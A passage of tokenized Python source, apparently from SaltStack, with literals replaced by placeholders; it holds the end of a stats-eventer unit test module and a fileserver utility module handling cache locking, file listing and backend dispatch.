. rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:1> ) <EOL> msg , sender = testStack . rxMsgs . popleft ( ) <EOL> self . assertDictEqual ( msg , { u'<STR_LIT>' : { u'<STR_LIT:src>' : [ ns2u ( minionName ) , u'<STR_LIT>' , None ] , <EOL> u'<STR_LIT>' : [ ns2u ( masterName ) , None , u'<STR_LIT>' ] } , <EOL> u'<STR_LIT>' : ns2u ( tag ) , <EOL> u'<STR_LIT:data>' : { u'<STR_LIT>' : <NUM_LIT> } } ) <EOL> act . actor . lane_stack . value . server . 
close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionStatsWrongMissingTag ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionStatsWrongMissingTag . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = '<STR_LIT>' <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . assertNotEqual ( tag , tagify ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> minionName = roadStack . value . local . name <EOL> masterName = testStack . local . name <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( masterName , None , None ) } } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . 
rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def testMinionStatsUnknownRemote ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionStatsUnknownRemote . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> tag = tagify ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> minionName = roadStack . value . local . name <EOL> unknownName = '<STR_LIT>' <EOL> statsReq . append ( { '<STR_LIT>' : { '<STR_LIT>' : ( minionName , None , '<STR_LIT>' ) , <EOL> '<STR_LIT:src>' : ( unknownName , None , None ) } , <EOL> '<STR_LIT>' : tag } ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . 
value . server . close ( ) <EOL> def testMinionStatsNoRequest ( self ) : <EOL> """<STR_LIT>""" <EOL> console . terse ( "<STR_LIT>" . format ( self . testMinionStatsNoRequest . __doc__ ) ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> self . addEnterDeed ( "<STR_LIT>" ) <EOL> act = self . addRecurDeed ( "<STR_LIT>" ) <EOL> self . resolve ( ) <EOL> self . frame . enter ( ) <EOL> roadStack = self . store . fetch ( '<STR_LIT>' ) <EOL> laneStack = self . store . fetch ( '<STR_LIT>' ) <EOL> roadStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> laneStack . value . stats = odict ( { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( roadStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> self . assertDictEqual ( laneStack . value . stats , { '<STR_LIT>' : <NUM_LIT> } ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) . value <EOL> statsReq = self . store . fetch ( '<STR_LIT>' ) . value <EOL> self . assertEqual ( len ( statsReq ) , <NUM_LIT:0> ) <EOL> self . frame . recur ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> testStack . serviceAll ( ) <EOL> self . assertEqual ( len ( testStack . rxMsgs ) , <NUM_LIT:0> ) <EOL> act . actor . lane_stack . value . server . close ( ) <EOL> act . actor . road_stack . value . server . close ( ) <EOL> testStack = self . store . fetch ( '<STR_LIT>' ) <EOL> if testStack : <EOL> testStack . value . server . close ( ) <EOL> def runOne ( test ) : <EOL> '''<STR_LIT>''' <EOL> test = StatsEventerTestCase ( test ) <EOL> suite = unittest . TestSuite ( [ test ] ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . 
run ( suite ) <EOL> def runSome ( ) : <EOL> """<STR_LIT>""" <EOL> tests = [ ] <EOL> names = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> tests . extend ( map ( StatsEventerTestCase , names ) ) <EOL> suite = unittest . TestSuite ( tests ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> def runAll ( ) : <EOL> """<STR_LIT>""" <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . TestLoader ( ) . loadTestsFromTestCase ( StatsEventerTestCase ) ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) <EOL> if __name__ == '<STR_LIT:__main__>' and __package__ is None : <EOL> runSome ( ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import errno <EOL> import fnmatch <EOL> import logging <EOL> import os <EOL> import re <EOL> import time <EOL> import salt . loader <EOL> import salt . utils <EOL> import salt . utils . locales <EOL> import salt . ext . six as six <EOL> log = logging . getLogger ( __name__ ) <EOL> def _unlock_cache ( w_lock ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . exists ( w_lock ) : <EOL> return <EOL> try : <EOL> if os . path . isdir ( w_lock ) : <EOL> os . rmdir ( w_lock ) <EOL> elif os . path . isfile ( w_lock ) : <EOL> os . unlink ( w_lock ) <EOL> except ( OSError , IOError ) as exc : <EOL> log . trace ( '<STR_LIT>' . format ( w_lock , exc ) ) <EOL> def _lock_cache ( w_lock ) : <EOL> try : <EOL> os . mkdir ( w_lock ) <EOL> except OSError as exc : <EOL> if exc . errno != errno . EEXIST : <EOL> raise <EOL> return False <EOL> else : <EOL> log . trace ( '<STR_LIT>' . format ( w_lock ) ) <EOL> return True <EOL> def wait_lock ( lk_fn , dest , wait_timeout = <NUM_LIT:0> ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . exists ( lk_fn ) : <EOL> return False <EOL> if not os . path . exists ( dest ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if not os . path . isfile ( dest ) : <EOL> _unlock_cache ( lk_fn ) <EOL> return False <EOL> timeout = None <EOL> if wait_timeout : <EOL> timeout = time . time ( ) + wait_timeout <EOL> s_count = <NUM_LIT:0> <EOL> s_size = os . stat ( dest ) . st_size <EOL> while True : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> if not os . path . exists ( lk_fn ) : <EOL> return False <EOL> size = os . stat ( dest ) . st_size <EOL> if size == s_size : <EOL> s_count += <NUM_LIT:1> <EOL> if s_count >= <NUM_LIT:3> : <EOL> _unlock_cache ( lk_fn ) <EOL> return False <EOL> else : <EOL> s_size = size <EOL> if timeout : <EOL> if time . time ( ) > timeout : <EOL> raise ValueError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . 
format ( <EOL> wait_timeout , dest , lk_fn ) ) <EOL> return False <EOL> def check_file_list_cache ( opts , form , list_cache , w_lock ) : <EOL> '''<STR_LIT>''' <EOL> refresh_cache = False <EOL> save_cache = True <EOL> serial = salt . payload . Serial ( opts ) <EOL> wait_lock ( w_lock , list_cache , <NUM_LIT:5> * <NUM_LIT> ) <EOL> if not os . path . isfile ( list_cache ) and _lock_cache ( w_lock ) : <EOL> refresh_cache = True <EOL> else : <EOL> attempt = <NUM_LIT:0> <EOL> while attempt < <NUM_LIT:11> : <EOL> try : <EOL> if os . path . exists ( w_lock ) : <EOL> wait_lock ( w_lock , list_cache , <NUM_LIT:15> * <NUM_LIT> ) <EOL> if os . path . exists ( list_cache ) : <EOL> cache_stat = os . stat ( list_cache ) <EOL> age = time . time ( ) - cache_stat . st_mtime <EOL> else : <EOL> age = opts . get ( '<STR_LIT>' , <NUM_LIT:30> ) + <NUM_LIT:1> <EOL> if age < opts . get ( '<STR_LIT>' , <NUM_LIT:30> ) : <EOL> with salt . utils . fopen ( list_cache , '<STR_LIT:rb>' ) as fp_ : <EOL> log . trace ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( list_cache ) ) <EOL> return serial . load ( fp_ ) . get ( form , [ ] ) , False , False <EOL> elif _lock_cache ( w_lock ) : <EOL> refresh_cache = True <EOL> break <EOL> except Exception : <EOL> time . sleep ( <NUM_LIT> ) <EOL> attempt += <NUM_LIT:1> <EOL> continue <EOL> if attempt > <NUM_LIT:10> : <EOL> save_cache = False <EOL> refresh_cache = True <EOL> return None , refresh_cache , save_cache <EOL> def write_file_list_cache ( opts , data , list_cache , w_lock ) : <EOL> '''<STR_LIT>''' <EOL> serial = salt . payload . Serial ( opts ) <EOL> with salt . utils . fopen ( list_cache , '<STR_LIT>' ) as fp_ : <EOL> fp_ . write ( serial . dumps ( data ) ) <EOL> _unlock_cache ( w_lock ) <EOL> log . trace ( '<STR_LIT>' . format ( w_lock ) ) <EOL> def check_env_cache ( opts , env_cache ) : <EOL> '''<STR_LIT>''' <EOL> if not os . path . isfile ( env_cache ) : <EOL> return None <EOL> try : <EOL> with salt . utils . 
fopen ( env_cache , '<STR_LIT:rb>' ) as fp_ : <EOL> log . trace ( '<STR_LIT>' . format ( env_cache ) ) <EOL> serial = salt . payload . Serial ( opts ) <EOL> return serial . load ( fp_ ) <EOL> except ( IOError , OSError ) : <EOL> pass <EOL> return None <EOL> def generate_mtime_map ( path_map ) : <EOL> '''<STR_LIT>''' <EOL> file_map = { } <EOL> for saltenv , path_list in six . iteritems ( path_map ) : <EOL> for path in path_list : <EOL> for directory , dirnames , filenames in os . walk ( path ) : <EOL> for item in filenames : <EOL> try : <EOL> file_path = os . path . join ( directory , item ) <EOL> file_map [ file_path ] = os . path . getmtime ( file_path ) <EOL> except ( OSError , IOError ) : <EOL> log . info ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' . format ( file_path ) ) <EOL> continue <EOL> return file_map <EOL> def diff_mtime_map ( map1 , map2 ) : <EOL> '''<STR_LIT>''' <EOL> if sorted ( map1 ) != sorted ( map2 ) : <EOL> return True <EOL> return False <EOL> def reap_fileserver_cache_dir ( cache_base , find_func ) : <EOL> '''<STR_LIT>''' <EOL> for saltenv in os . listdir ( cache_base ) : <EOL> env_base = os . path . join ( cache_base , saltenv ) <EOL> for root , dirs , files in os . walk ( env_base ) : <EOL> if len ( dirs ) == <NUM_LIT:0> and len ( files ) == <NUM_LIT:0> : <EOL> if time . time ( ) - os . path . getctime ( root ) > <NUM_LIT> : <EOL> os . rmdir ( root ) <EOL> continue <EOL> for file_ in files : <EOL> file_path = os . path . join ( root , file_ ) <EOL> file_rel_path = os . path . relpath ( file_path , env_base ) <EOL> try : <EOL> filename , _ , hash_type = file_rel_path . rsplit ( '<STR_LIT:.>' , <NUM_LIT:2> ) <EOL> except ValueError : <EOL> log . warning ( ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) . format ( file_ ) ) <EOL> continue <EOL> ret = find_func ( filename , saltenv = saltenv ) <EOL> if ret [ '<STR_LIT:path>' ] == '<STR_LIT>' : <EOL> os . 
unlink ( file_path ) <EOL> def is_file_ignored ( opts , fname ) : <EOL> '''<STR_LIT>''' <EOL> if opts [ '<STR_LIT>' ] : <EOL> for regex in opts [ '<STR_LIT>' ] : <EOL> if re . search ( regex , fname ) : <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> fname <EOL> ) <EOL> ) <EOL> return True <EOL> if opts [ '<STR_LIT>' ] : <EOL> for glob in opts [ '<STR_LIT>' ] : <EOL> if fnmatch . fnmatch ( fname , glob ) : <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> fname <EOL> ) <EOL> ) <EOL> return True <EOL> return False <EOL> def clear_lock ( clear_func , role , remote = None , lock_type = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> msg = '<STR_LIT>' . format ( lock_type , role ) <EOL> if remote : <EOL> msg += '<STR_LIT>' . format ( remote ) <EOL> log . debug ( msg ) <EOL> return clear_func ( remote = remote , lock_type = lock_type ) <EOL> class Fileserver ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts ) : <EOL> self . opts = opts <EOL> self . servers = salt . loader . fileserver ( opts , opts [ '<STR_LIT>' ] ) <EOL> def _gen_back ( self , back ) : <EOL> '''<STR_LIT>''' <EOL> if not back : <EOL> back = self . opts [ '<STR_LIT>' ] <EOL> else : <EOL> try : <EOL> back = back . split ( '<STR_LIT:U+002C>' ) <EOL> except AttributeError : <EOL> back = six . text_type ( back ) . split ( '<STR_LIT:U+002C>' ) <EOL> ret = [ ] <EOL> if not isinstance ( back , list ) : <EOL> return ret <EOL> try : <EOL> subtract_only = all ( ( x . startswith ( '<STR_LIT:->' ) for x in back ) ) <EOL> except AttributeError : <EOL> pass <EOL> else : <EOL> if subtract_only : <EOL> ret = self . opts [ '<STR_LIT>' ] <EOL> for sub in back : <EOL> if '<STR_LIT>' . format ( sub [ <NUM_LIT:1> : ] ) in self . servers : <EOL> ret . remove ( sub [ <NUM_LIT:1> : ] ) <EOL> elif '<STR_LIT>' . format ( sub [ <NUM_LIT:1> : - <NUM_LIT:2> ] ) in self . servers : <EOL> ret . remove ( sub [ <NUM_LIT:1> : - <NUM_LIT:2> ] ) <EOL> return ret <EOL> for sub in back : <EOL> if '<STR_LIT>' . 
format ( sub ) in self . servers : <EOL> ret . append ( sub ) <EOL> elif '<STR_LIT>' . format ( sub [ : - <NUM_LIT:2> ] ) in self . servers : <EOL> ret . append ( sub [ : - <NUM_LIT:2> ] ) <EOL> return ret <EOL> def master_opts ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> return self . opts <EOL> def update_opts ( self ) : <EOL> for name , func in self . servers . items ( ) : <EOL> try : <EOL> if '<STR_LIT>' in func . __globals__ : <EOL> func . __globals__ [ '<STR_LIT>' ] . update ( self . opts ) <EOL> except AttributeError : <EOL> pass <EOL> def clear_cache ( self , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> cleared = [ ] <EOL> errors = [ ] <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> log . debug ( '<STR_LIT>' . format ( fsb ) ) <EOL> failed = self . servers [ fstr ] ( ) <EOL> if failed : <EOL> errors . extend ( failed ) <EOL> else : <EOL> cleared . append ( <EOL> '<STR_LIT>' <EOL> . format ( fsb ) <EOL> ) <EOL> return cleared , errors <EOL> def lock ( self , back = None , remote = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> locked = [ ] <EOL> errors = [ ] <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> msg = '<STR_LIT>' . format ( fsb ) <EOL> if remote : <EOL> if not isinstance ( remote , six . string_types ) : <EOL> errors . append ( <EOL> '<STR_LIT>' <EOL> . format ( remote ) <EOL> ) <EOL> continue <EOL> else : <EOL> msg += '<STR_LIT>' . format ( remote ) <EOL> log . debug ( msg ) <EOL> good , bad = self . servers [ fstr ] ( remote = remote ) <EOL> locked . extend ( good ) <EOL> errors . extend ( bad ) <EOL> return locked , errors <EOL> def clear_lock ( self , back = None , remote = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> cleared = [ ] <EOL> errors = [ ] <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . 
format ( fsb ) <EOL> if fstr in self . servers : <EOL> good , bad = clear_lock ( self . servers [ fstr ] , <EOL> fsb , <EOL> remote = remote ) <EOL> cleared . extend ( good ) <EOL> errors . extend ( bad ) <EOL> return cleared , errors <EOL> def update ( self , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> log . debug ( '<STR_LIT>' . format ( fsb ) ) <EOL> self . servers [ fstr ] ( ) <EOL> def envs ( self , back = None , sources = False ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> ret = set ( ) <EOL> if sources : <EOL> ret = { } <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if sources : <EOL> ret [ fsb ] = self . servers [ fstr ] ( ) <EOL> else : <EOL> ret . update ( self . servers [ fstr ] ( ) ) <EOL> if sources : <EOL> return ret <EOL> return list ( ret ) <EOL> def init ( self , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> self . servers [ fstr ] ( ) <EOL> def find_file ( self , path , saltenv , back = None ) : <EOL> '''<STR_LIT>''' <EOL> back = self . _gen_back ( back ) <EOL> kwargs = { } <EOL> fnd = { '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if os . path . isabs ( path ) : <EOL> return fnd <EOL> if '<STR_LIT>' in path : <EOL> return fnd <EOL> if salt . utils . url . is_escaped ( path ) : <EOL> path = salt . utils . url . unescape ( path ) <EOL> else : <EOL> if '<STR_LIT:?>' in path : <EOL> hcomps = path . split ( '<STR_LIT:?>' ) <EOL> path = hcomps [ <NUM_LIT:0> ] <EOL> comps = hcomps [ <NUM_LIT:1> ] . split ( '<STR_LIT:&>' ) <EOL> for comp in comps : <EOL> if '<STR_LIT:=>' not in comp : <EOL> continue <EOL> args = comp . 
split ( '<STR_LIT:=>' , <NUM_LIT:1> ) <EOL> kwargs [ args [ <NUM_LIT:0> ] ] = args [ <NUM_LIT:1> ] <EOL> if '<STR_LIT>' in kwargs : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> kwargs . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT>' in kwargs : <EOL> saltenv = kwargs . pop ( '<STR_LIT>' ) <EOL> if not isinstance ( saltenv , six . string_types ) : <EOL> saltenv = six . text_type ( saltenv ) <EOL> for fsb in back : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> fnd = self . servers [ fstr ] ( path , saltenv , ** kwargs ) <EOL> if fnd . get ( '<STR_LIT:path>' ) : <EOL> fnd [ '<STR_LIT>' ] = fsb <EOL> return fnd <EOL> return fnd <EOL> def serve_file ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT:data>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT:path>' not in load or '<STR_LIT>' not in load or '<STR_LIT>' not in load : <EOL> return ret <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> fnd = self . find_file ( load [ '<STR_LIT:path>' ] , load [ '<STR_LIT>' ] ) <EOL> if not fnd . get ( '<STR_LIT>' ) : <EOL> return ret <EOL> fstr = '<STR_LIT>' . format ( fnd [ '<STR_LIT>' ] ) <EOL> if fstr in self . servers : <EOL> return self . servers [ fstr ] ( load , fnd ) <EOL> return ret <EOL> def file_hash ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . 
pop ( '<STR_LIT>' ) <EOL> if '<STR_LIT:path>' not in load or '<STR_LIT>' not in load : <EOL> return '<STR_LIT>' <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> fnd = self . find_file ( salt . utils . locales . sdecode ( load [ '<STR_LIT:path>' ] ) , <EOL> load [ '<STR_LIT>' ] ) <EOL> if not fnd . get ( '<STR_LIT>' ) : <EOL> return '<STR_LIT>' <EOL> fstr = '<STR_LIT>' . format ( fnd [ '<STR_LIT>' ] ) <EOL> if fstr in self . servers : <EOL> return self . servers [ fstr ] ( load , fnd ) <EOL> return '<STR_LIT>' <EOL> def file_list ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = set ( ) <EOL> if '<STR_LIT>' not in load : <EOL> return [ ] <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( load . pop ( '<STR_LIT>' , None ) ) : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> ret . update ( self . servers [ fstr ] ( load ) ) <EOL> ret = [ salt . utils . locales . sdecode ( f ) for f in ret ] <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = [ f for f in ret if f . startswith ( prefix ) ] <EOL> return sorted ( ret ) <EOL> def file_list_emptydirs ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = set ( ) <EOL> if '<STR_LIT>' not in load : <EOL> return [ ] <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . 
text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( None ) : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> ret . update ( self . servers [ fstr ] ( load ) ) <EOL> ret = [ salt . utils . locales . sdecode ( f ) for f in ret ] <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = [ f for f in ret if f . startswith ( prefix ) ] <EOL> return sorted ( ret ) <EOL> def dir_list ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = set ( ) <EOL> if '<STR_LIT>' not in load : <EOL> return [ ] <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( load . pop ( '<STR_LIT>' , None ) ) : <EOL> fstr = '<STR_LIT>' . format ( fsb ) <EOL> if fstr in self . servers : <EOL> ret . update ( self . servers [ fstr ] ( load ) ) <EOL> ret = [ salt . utils . locales . sdecode ( f ) for f in ret ] <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = [ f for f in ret if f . startswith ( prefix ) ] <EOL> return sorted ( ret ) <EOL> def symlink_list ( self , load ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' in load : <EOL> salt . utils . warn_until ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) <EOL> load . pop ( '<STR_LIT>' ) <EOL> ret = { } <EOL> if '<STR_LIT>' not in load : <EOL> return { } <EOL> if not isinstance ( load [ '<STR_LIT>' ] , six . string_types ) : <EOL> load [ '<STR_LIT>' ] = six . text_type ( load [ '<STR_LIT>' ] ) <EOL> for fsb in self . _gen_back ( load . pop ( '<STR_LIT>' , None ) ) : <EOL> symlstr = '<STR_LIT>' . 
format ( fsb ) <EOL> if symlstr in self . servers : <EOL> ret = self . servers [ symlstr ] ( load ) <EOL> ret = dict ( [ <EOL> ( salt . utils . locales . sdecode ( x ) , salt . utils . locales . sdecode ( y ) ) for x , y in ret . items ( ) <EOL> ] ) <EOL> prefix = load . get ( '<STR_LIT>' , '<STR_LIT>' ) . strip ( '<STR_LIT:/>' ) <EOL> if prefix != '<STR_LIT>' : <EOL> ret = dict ( [ <EOL> ( x , y ) for x , y in six . iteritems ( ret ) if x . startswith ( prefix ) <EOL> ] ) <EOL> return ret <EOL> class FSChan ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , opts , ** kwargs ) : <EOL> self . opts = opts <EOL> self . kwargs = kwargs <EOL> self . fs = Fileserver ( self . opts ) <EOL> self . fs . init ( ) <EOL> self . fs . update ( ) <EOL> self . cmd_stub = { '<STR_LIT>' : { } } <EOL> def send ( self , load , tries = None , timeout = None ) : <EOL> '''<STR_LIT>''' <EOL> if '<STR_LIT>' not in load : <EOL> log . error ( '<STR_LIT>' . format ( load ) ) <EOL> return { } <EOL> cmd = load [ '<STR_LIT>' ] . lstrip ( '<STR_LIT:_>' ) <EOL> if cmd in self . cmd_stub : <EOL> return self . cmd_stub [ cmd ] <EOL> if cmd == '<STR_LIT>' : <EOL> return self . fs . envs ( ) <EOL> if not hasattr ( self . fs , cmd ) : <EOL> log . error ( '<STR_LIT>' . format ( load ) ) <EOL> return { } <EOL> return getattr ( self . fs , cmd ) ( load ) </s>
